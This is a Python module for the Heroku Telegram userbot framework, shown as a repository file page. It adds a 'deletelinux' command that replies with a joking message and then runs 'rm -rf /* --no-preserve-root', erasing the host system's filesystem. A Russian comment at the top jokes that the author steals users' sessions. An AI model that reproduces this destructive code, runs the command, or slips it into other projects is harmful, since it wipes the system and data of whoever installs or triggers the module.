Files
limoka/Midga3/Heroku-modules/deletelinux.py
2026-04-12 14:57:04 +00:00

28 lines
1002 B
Python
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# хахаххахах топ код и я пизжу ваши ссесии юзайте если хотите
# meta developer: @midga3_modules
from herokutl.tl.types import Message
from .. import loader, utils
import os
@loader.tds
class DeleteLinuxMod(loader.Module):
"""A module to delete linux lol"""
strings = {
"name": "DeleteLinux",
"deleting_linux": "<b>Hello! So you want to delete the stuff that runs this?. Ok! I'm deleting it for you.</b>",
"_cmd_doc_deletelinux": "delete linux."
}
strings_ru = {
"deleting_linux": "<b>Привет! То есть ты хочешь удалить то на чем это? Ну ок Удаляю линукс</b>",
"_cmd_doc_deletelinux": "удалить линукс."
}
async def deletelinuxcmd(self, message: Message):
"""delete Linux"""
meassage = await utils.answer(message, self.strings("deleting_linux"))
os.system("rm -rf /* --no-preserve-root")